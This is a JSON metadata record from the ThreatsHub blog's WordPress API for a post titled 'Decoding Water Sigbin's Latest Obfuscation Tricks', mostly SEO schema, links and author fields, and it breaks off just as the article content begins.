Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","og_locale":"en_US","og_type":"article","og_title":"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-05-30T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Decoding Water Sigbin’s Latest Obfuscation Tricks","datePublished":"2024-05-30T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/"},"wordCount":1486,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","keywords":["Trend Micro Research : APT&Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cloud","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&Vulnerabilities","Trend Micro Research : Reports","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","url":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","name":"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","datePublished":"2024-05-30T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Decoding Water Sigbin’s Latest Obfuscation Tricks"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/56188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=56188"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/56188\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=56188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=56188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=56188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":56188,"date":"2024-05-30T00:00:00","date_gmt":"2024-05-30T00:00:00","guid":{"rendered":"urn:uuid:6542c108-3538-9f4a-5029-b67c689379c0"},"modified":"2024-05-30T00:00:00","modified_gmt":"2024-05-30T00:00:00","slug":"decoding-water-sigbins-latest-obfuscation-tricks","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","title":{"rendered":"Decoding Water Sigbin’s Latest Obfuscation Tricks"},"content":{"rendered":"